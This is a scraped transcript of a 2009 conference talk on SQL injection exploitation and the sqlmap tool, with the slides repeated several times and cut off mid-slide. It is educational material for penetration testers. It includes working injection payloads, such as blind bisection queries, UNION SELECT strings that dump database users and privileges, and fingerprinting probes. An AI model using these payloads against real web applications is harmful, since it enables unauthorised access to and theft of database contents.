Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
SQL injection exploitation internals
-
Upload
bernardo-damele-a-g -
Category
Technology
-
view
12.629 -
download
2
description
Transcript of SQL injection exploitation internals
SQL injectionexploitation internals
How do I exploit this webapplication injection point
Intercon III LondonJanuary 9 2009
Bernardo Damele A Gbernardodamelegmailcom
Intercon III London ndash January 9 2009 2
About meBernardo Damele A G
Proud father
Penetration Tester and Security Researcher
Currently working at Portcullis Computer Security Ltd
sqlmap lead developer
Intercon III London ndash January 9 2009 3
SQL what (12) From the OWASP Testing Guide
ldquoSQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commandsrdquo
There are plenty of resources on the Net about SQL injection concept it is a high-risk web application security flaw
A long list of resources can be found on my delicious profile httpdeliciouscominquissqlinjection
I keep it updated with stuff I consider valuable
A wise man once told me
ldquoAn image is worth thousands wordsrdquo
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 2
About meBernardo Damele A G
Proud father
Penetration Tester and Security Researcher
Currently working at Portcullis Computer Security Ltd
sqlmap lead developer
Intercon III London ndash January 9 2009 3
SQL what (12) From the OWASP Testing Guide
ldquoSQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commandsrdquo
There are plenty of resources on the Net about SQL injection concept it is a high-risk web application security flaw
A long list of resources can be found on my delicious profile httpdeliciouscominquissqlinjection
I keep it updated with stuff I consider valuable
A wise man once told me
ldquoAn image is worth thousands wordsrdquo
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 3
SQL what (12) From the OWASP Testing Guide
ldquoSQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commandsrdquo
There are plenty of resources on the Net about SQL injection concept it is a high-risk web application security flaw
A long list of resources can be found on my delicious profile httpdeliciouscominquissqlinjection
I keep it updated with stuff I consider valuable
A wise man once told me
ldquoAn image is worth thousands wordsrdquo
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
